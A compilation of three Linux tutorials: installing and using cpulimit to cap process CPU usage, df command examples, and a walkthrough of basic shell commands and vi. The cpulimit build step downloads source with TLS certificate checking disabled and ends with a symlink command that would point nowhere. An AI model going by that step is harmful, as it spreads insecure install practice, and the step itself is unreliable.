cpulimit is a small program written in C that allows to limit CPU usage by Linux process. Limit is specified in percentage so it’s possible to prevent high CPU load generated by scripts, programs or processes.

I found cpulimit pretty useful for the scripts running from cron, for example I can do overnight backups and be sure that compression of 50GB file via gzip won’t eat all CPU resources and all other system processes will have enough CPU time.

In most of Linux distributions cpulimit is available from binary repositories so you can install it using commands:

sudo apt-get install cpulimit

or

sudo yum install cpulimit

If it’s not possible in your distro then it’s extremely easy to compile it:

cd /usr/src/ wget --no-check-certificate https://github.com/opsengine/cpulimit/tarball/master -O cpulimit.tar tar -xvf cpulimit.tar cd opsengine-cpulimit-9df7758 make ln -s cpulimit /usr/sbin/cpulimit

From that moment you can run commands limited by CPU percentage, e.g. below command executes gzip compression so that gzip process will never step over 10% of CPU limit:

/usr/sbin/cpulimit --limit=10 /bin/gzip vzdump-openvz-102-2012_06_26-19_01_11.tar

You can check actual CPU usage by gzip using commands:

ps axu | grep [g]zip

or

top

Btw, the first command contains ‘grep [g]zip’ to avoid the last line in common output:

root 896448 10.0 3.1 159524 3528 ? S 13:12 0:00 /usr/sbin/cpulimit --limit=10 /bin/gzip vzdump-openvz-102-2012_06_26-19_01_11.tar root 26490 0.0 0.0 6364 708 pts/0 S+ 15:24 0:00 grep gzip

Using cpulimit you can also allocate CPU limit to already running processes, e.g. below command will allocate 20% CPU limit to process with PID 2342:

/usr/sbin/cpulimit -p 2342 -l 20

It’s possible to specify process by its executable file instead of PID:

/usr/sbin/cpulimit -P /usr/sbin/nginx -l 30

Linux df Command Usage Examples

Introduction

Linux df command can be used to display disk usage statistics for the file systems present on the Linux system. It’s handy tool to know which filesystem is consuming how much memory. Also, if a particular filename is picked up and supplied as argument to df command then it displays the disk usage statistics for the file system on which the file resides.

This command can be used by the system administrators to know the disk usage status of various file systems on Linux so that proper clean-up and maintenance of the Linux system can be performed. The df command provides various options through which the output can be customized in a way that is most suited to the user.

Syntax

Before jumping on to the examples, lets first take a look on how to use the df command. Here is the syntax information of df command from the man page:

df [OPTION]... [FILE]...

So we see that the df command does not require any mandatory argument. The OPTION and FILE arguments are non-mandatory. While the OPTION argument tells the df command to act in a way as specified by the definition of that OPTION, the FILE argument tells the df command to print disk usage of only that file system on which the FILE resides.

NOTE: for those who are new to this type of syntax information, any argument specified in square brackets [] are non-mandatory.

Examples

1. Basic example

Here is how the df command can be used in its most basic form.

# df Filesystem 1K-blocks Used Available Use% Mounted on /dev/sda6 29640780 4320704 23814388 16% / udev 1536756 4 1536752 1% /dev tmpfs 617620 888 616732 1% /run none 5120 0 5120 0% /run/lock none 1544044 156 1543888 1% /run/shm

In the output above, the disk usage statistics of all the file systems were displayed when the df command was run without any argument.

The first column specifies the file system name, the second column specifies the total memory for a particular file system in units of 1k-blocks where 1k is 1024 bytes. Used and available columns specify the amount of memory that is in use and is free respectively. The use column specifies the used memory in percentage while the final column ‘Mounted on’ specifies the mount point of a file system.

2. Get the disk usage of file system through a file

As already discussed in the introduction, df can display the disk usage information of a file system if any file residing on that file system is supplied as an argument to it.

Here is an example:

# df test Filesystem 1K-blocks Used Available Use% Mounted on /dev/sda6 29640780 4320600 23814492 16% /

Here is another example:

# df groff.txt Filesystem 1K-blocks Used Available Use% Mounted on /dev/sda6 29640780 4320600 23814492 16% /

We used two different files (residing on same file system) as argument to df command. The output confirms that the df command displays the disk usage of file system on which a file resides.

3. Display inode information

There exists an option -i through which the output of the df command displays the inode information instead of block usage.

For example:

# df -i Filesystem Inodes IUsed IFree IUse% Mounted on /dev/sda6 1884160 261964 1622196 14% / udev 212748 560 212188 1% /dev tmpfs 216392 477 215915 1% /run none 216392 3 216389 1% /run/lock none 216392 8 216384 1% /run/shm

As we can see in the output above, the inode related information was displayed for each filesystem.

4. Produce a grand total

There exists an option –total through which the output displays an additional row at the end of the output which produces a total for every column.

Here is an example:

# df --total Filesystem 1K-blocks Used Available Use% Mounted on /dev/sda6 29640780 4320720 23814372 16% / udev 1536756 4 1536752 1% /dev tmpfs 617620 892 616728 1% /run none 5120 0 5120 0% /run/lock none 1544044 156 1543888 1% /run/shm total 33344320 4321772 27516860 14%

So we see that the output contains an extra row towards the end of the output and displays total for each column.

5. Produce output in human readable format

There exists an option -h through which the output of df command can be produced in a human readable format.

Here is an example:

# df -h Filesystem Size Used Avail Use% Mounted on /dev/sda6 29G 4.2G 23G 16% / udev 1.5G 4.0K 1.5G 1% /dev tmpfs 604M 892K 603M 1% /run none 5.0M 0 5.0M 0% /run/lock none 1.5G 156K 1.5G 1% /run/shm

So we can see that the output displays the figures in form of ‘G’ (gigabytes), ‘M’ (megabytes) and ‘K’ (kilobytes). This makes the output easy to read and comprehend and thus makes is human readable. Note that the name of the second column is also changed to ‘size’ in order to make it human readable.

Some basic Linux commands everyone must know

Now let us get into commands. Please note that everything in Linux is case-sensitive, so all commands should be in appropriate case.

• pwd  – the command is called “print working directory” which is used to print the current directory. When you are logged in, you are taken into your home directory. When Linux administrator creates your user account, he specifies your home directory where you generally keep files, folders etc. Type the command pwd in command prompt and hit [ Enter ].

•  who – this give you information regarding currently logged in users. Suppose you want to know how many users are connected to Linux system along with you. This command gives details like user id, logged in time, terminals to which users are connected etc. This has another variation who am i which gives information about your session. Type the command who in your command prompt and hit [ Enter ].

First column is user id, second column is the terminal and third one is the logged in time. Now type who am i, hit [ Enter ] and verify the result.

• cd - short name of  “change directory” which is used to switch to another directory from your current working directory. This command is used with the argument directory name to which we should change, cd <directory name>. If you type cd without any argument, you are changed to your home directory. Type cd /usr in your command prompt and hit enter. Then type pwd command and hit [ Enter ].

 In the above diagram you could see that /usr is printed on executing pwd command. This means that we changed our working directory to /usr using cd command. Now just type cd and hit [ Enter ]. Validate the result using pwd command.

• ls - List command used to show files and directories. If you just type ls, it lists files and directories in the current working directory. Optionally you may give the directory name as argument to list content in that particular directory. You may add combination of additional arguments to get more features in the result set. Some arguments are given below.
  •  -l – this argument gives detailed listing of files and directories like owner of the file, size of the file, whether the file is a directory, last modified time etc. This is a common command everybody uses.
  • -R – The argument -R is used for recursive purpose. This means it list all files in sub directories also. It searches all inner directories recursively and give results.
  • -a – The argument -a lists all hidden files.
  • -t – sort by modification time in descending order
  • directory name – If you give directory name as argument, it lists content in that directory rather than listing current working directory.

Ok, now let us put everything into an example. Go to your command prompt, type ls -lt /usr and hit [ Enter ].

The above command gives detailed listing of files in the directory /usr in descending order of modified time. The first column is about file permissions. The first character shows whether it is a directory. For eg, in the above screenshot we could see that bin is a directory because the first character of file permission column is d.

output.log is a file because the first character is -. Second column gives the number of links to the file. Third column shows the owner of the file and fourth column is about owner group. Fifth column shows file size in bytes and sixth column about last modified time. Final column shows the name of the file. Please note that in Linux everything is file. So directory is also a file in Linux system.

• mkdir - Used to create directories. You should give directory name as argument. Let us create a directory in your home directory. Go to your home directory using cd command. Type the following command and hit [ Enter ].

mkdir testdir

The above command creates testdir in your home directory. Verify the same using ls command.

•  touch – This command is used to change the timestamp of the file. But one of the most import function of the command is to create an empty file if it do not exist. Go to your system directory, type the following command and hit [ Enter ].

touch sample.txt

It creates sample.txt file. Verify the same using ls command.

• cat – cat command is very useful for many purposes like creating files, adding and appending content to files etc. It also diplays the content of the file to standard output or another file. You may concatenate multiple files and display the content. Let us try some examples. Type the following command and hit [ Enter ].

cat > sample.txt

It waits for the input which should be added to the file in the next line. Type the text “Hello how are you?” and hit [ Enter ]. Then press [ Ctrl+d ]. This add the text to sample.txt file. Now let us display the content of the file.

cat sample.txt

You get the message in screen. Ok, now rather than writing the content to standard output, let us write it into another file.

cat sample.txt > samplecopy.txt

The above command creates samplecopy.txt file if it do not exists already and add the content of the file sample.txt. Verify the result using cat command.

Let us append the content. Type the following command and hit [ Enter ].

cat >> sample.txt

In the next line just add the text “I am fine”, hit [ Enter ] and press [ Ctrl+d ]. Verify the content of the file sample.txt using cat command. You may combine multiple files and show the output. For eg,

cat sample.txt samplecopy.txt, displays the content from both files. You may send it to another file also.

•  cp - copy command is used to copy files and directories. You have to give source and destination of files and directories. For eg, when you copy file, you may give the destination as either file name or directory name to which the file should be copied. You may copy entire directory also to another location. Some sample examples are given below.

cp sample.txt newsample.txt, this copies the file sample.txt to newsample.txt. You have to give source file name as first argument followed by destination. Verify the result.

Now let us copy the file sample.txt to our testdir directory which we already created. Type the following command and hit [ Enter ].

cp sample.txt testdir, this copies the file to directory. Here we provide directory name as second argument. Verify the result using cd and ls commands. Now let us copy the directory testdir. Go to your home directory and type the following command. Hit [ Enter ].

cp -R testdir newdir, this command copies testdir and its content to another directory newdir. Verify the result. Check whether sample.txt file in testdir is also available in newdir directory. -R argument is used to copy directories recursively.

•  mv – move command is used to rename files and directories. It is also used to move files from source to destination. Let us try some examples. Go to your home directory and execute following commands.

mv sample.txt log.txt, this command rename sample.txt to log.txt. source file name is given as first argument.

mv testdir logdir, this rename testdir directory to logdir directory. Please note that the content inside directory are not renamed.

mv log.txt logdir, this command moves log.txt file to logdir directory.

• rm – remove command is used to delete files and directories. Some examples are given below.

rm newsample.txt, deletes newsample.txt file. You can give multiple file names in single command delimited by space to delete multiple files in a stretch. For eg, rm file1 file2 remove both files.

rm -R logdir, this command deletes logdir directory recursively.

• chmod – this command is used to change file permissions. Every file or directory in Linux is associated with file permissions. There are three levels of permissions, read, edit and execute. You can’t modify the file if you don’t have write permission. Similarly if you want to execute a shell script file, you need execute permission on it.

Users are categorized based on the following groups.

1. Owner – the owner of the file, basically if the file is created by you, you are the owner of the file.
2. Owner Group – the group in which the owner is a member. Owner group level permission allow other users who also belong to this group to share the same permission level.
3. Others – those users who do not belong to the above categories.

The command ls -lt gives details about file permissions in first column. For eg, in the above screen shot let us examine the permission of newdir directory. The first character d specifies that it is a directory. Next three characters is about owner permissions. rwx shows that owner has all rights. Next three characters are related to owner group file permission. Here the members of owner group have no write permission. Similarly last three characters are related to other members permission. Here also they don’t have write permission.

chmod could be used with different argument types, but I always like to use number arguments. 

4 – read access

2 – write access

1 – execute access

You should add these integers according to the given permission. Let us try some examples.

chmod 777 samplecopy.txt, this command gives full rights to all three types of users. First number is for owner, second for owner group and third for others. Suppose you want to protect your file so that others are not allowed to read it. You may give the command as

chmod 700 samplecopy.txt

Similarly if you want to give just read access other than you, you may give command as,

chmod 744 samplecopy.txt

• passwd – this command is used to change the password of the current user. It asks for current password, once you supply it you may type the new password to change it.

• grep – this command is used to search for a particular pattern in a file or other input. This is commonly used with other commands like ls, cat etc as input using pipe symbol. One of the common use of the command is to search for a particular file in a directory. Suppose you have an image directory and you would like to know whether a particular image exists in directory. Then you may give command like this,

ls -lt | grep image.gif, this gives output row from detailed listing. For eg, just go through the following screenshot.

In the above example, we just want to search for a pattern “copy” which is found in samplecopy.txt file listing record.

• vi - vi is a text editor used to edit files which is a very import command in Linux. Some Linux versions like Ubuntu give an improved version of vi editor called vim. vi has three modes; insert mode, command mode and line mode.
  • Insert mode – For making any changes in the file, you should be in insert mode.
  • Command mode – When you open vi editor you will be in this mode. This mode is used to do many shortcut tasks like delete words, switch to insert mode, copy and paste operation etc. When you are in insert mode you may press [ Esc ] key to get into command mode.
  • Line mode – this mode is used to issue commands for saving file, quitting editor etc. By pressing [ : ] key, you may get into this mode from command mode.

vi editor has large number of commands, you should be reasonably familiar with it in order to use Linux system. Let us do some examples here. Go to your home directory, type the following command and hit [ Enter ].

vi example

The editor appears. Now we are in command prompt. If you want to get into insert mode press [ i] key. Once you press [ i ] key, you may enter text into the editor. Just type “Hello how are you?” in the editor. Once you made modifications in the editor, you should go to command prompt by pressing [ Esc ] key. Now you are in command prompt. Now let us save the file. Save command is executed at line mode. Press [ : ] key. For saving the file, you have to give the command wq and hit enter. This command saves the file and quit the editor.

Now verify the content of the file using cat command. Ok now let us examine some vi commands executed in command mode. In command mode, almost all commands do not require to press [ Enter ] key. 

1.  i – switch to insert mode, content is inserted just before the current cursor position.
2. a – switch to insert mode, text is appended just after the current cursor position.
3. A – switch to insert mode, start appending text after the end of the last character.
4. x – deletes single character in the current cursor position.
5. dw – deletes word in the current cursor position.
6. dd – delete current line.u – undo last change.
7. h – move cursor to left like left arrow key.
8. l – move cursor to right like right arrow key.
9. j – move cursor down to next line similar to down arrow key.
10. k – move cursor up to next line similar to up arrow key.

Some commands useful in line mode. Almost all commands in this mode are followed by pressing [ Enter ] key. You go to line mode from command mode by pressing [ : ] key.

1. w – save file, got back into command mode.
2. wq – save and quit editor.
3. q – exit editor.
4. q! – quit editor without saving last session changes.
5. /[pattern] – search for pattern in the file. It go back to command prompt and if any match is found, it keeps the cursor in the first match line.
6. $ – move the cursor to the last line in the file.

• man - man <command name> is used to get help regarding a particular command in Liux. If you want to know more about a command you should use this command. For eg, man ls is used to get help for list command. Type the command in shell prompt and hit [ Enter ].

• more – Suppose you are making a detailed listing of large number of files in a directory. If you want to see the listing page by page, more command comes at your help. Just type the following command and hit [ Enter ].

 ls -lt /etc | more, here the listing of ls command is used as input for more command using pipe symbol. Here the number of records is showing in a page and waits for another key press. If you want to go to next page, you may press [ Space ] key .  

• tail – tail command is used to print the last lines of input text. The default value of number of lines is 10. But you can limit the number of lines using -n or –lines argument. Go to your home directory and type,

ls -lt | tail -n 1, this command prints the last line of listing. You may use the command to print the last portion of file also. For eg, tail -n 1 example prints the last line of example file.

• wc – The word count command gives count about words, lines and characters in input text. -l argument gives number of lines, -w gives number of words, -m gives number of characters. For eg,

wc -w example gives number of words in example file.